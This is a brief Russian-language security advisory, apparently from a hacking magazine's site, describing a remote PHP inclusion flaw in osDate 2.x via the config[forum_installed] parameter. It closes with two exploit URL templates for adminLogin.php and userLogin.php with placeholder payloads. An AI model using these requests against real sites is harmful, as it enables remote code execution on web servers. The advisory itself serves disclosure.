Рекомендуем почитать:
Хакер #305. Многошаговые SQL-инъекции
Программа: osDate 2.x
Уязвимость позволяет удаленному пользователю выполнить произвольный PHP
сценарий на целевой системе. Уязвимость существует из-за недостаточной обработки
входных данных в параметре "config[forum_installed]" сценариями forum/adminLogin.php
и forum/userLogin.php . Удаленный пользователь может выполнить произвольный PHP
сценарий на целевой системе с привилегиями Web сервера.
Эксплоит:
http://localhost/[path]/forum/adminLogin.php?config[forum_installed]=[evilc0de]
http://localhost/[path]/forum/userLogin.php?config[forum_installed]=[evilc0de]